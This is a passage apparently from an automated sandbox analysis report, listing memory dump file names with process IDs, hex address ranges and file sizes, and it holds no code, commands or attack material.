                                                                                                                                                                Filesize

                                                                                                                                                                4KB

                                                                                                                                                              • memory/5024-350-0x0000000002240000-0x0000000002259000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                100KB

                                                                                                                                                              • memory/5024-354-0x000000001B720000-0x000000001B721000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4KB

                                                                                                                                                              • memory/5024-256-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/5024-278-0x000000001AF10000-0x000000001AF12000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                8KB

                                                                                                                                                              • memory/5024-263-0x0000000000320000-0x0000000000321000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4KB

                                                                                                                                                              • memory/5032-441-0x00000000046A2000-0x00000000046A3000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4KB

                                                                                                                                                              • memory/5032-443-0x00000000046A0000-0x00000000046A1000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4KB

                                                                                                                                                              • memory/5032-416-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/5044-435-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4KB

                                                                                                                                                              • memory/5044-405-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/5072-257-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/5104-260-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/5104-284-0x0000000000420000-0x0000000000421000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4KB

                                                                                                                                                              • memory/5104-332-0x0000000000D20000-0x0000000000D21000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4KB

                                                                                                                                                              • memory/5208-457-0x000000000041882E-mapping.dmp
                                                                                                                                                              • memory/5224-458-0x000000000046B76D-mapping.dmp
                                                                                                                                                              • memory/5232-460-0x000000000044003F-mapping.dmp
                                                                                                                                                              • memory/5256-516-0x0000000000418826-mapping.dmp
                                                                                                                                                              • memory/5420-518-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/5512-473-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/5668-476-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/5800-481-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/5876-484-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/5968-490-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/6004-494-0x0000000000000000-mapping.dmp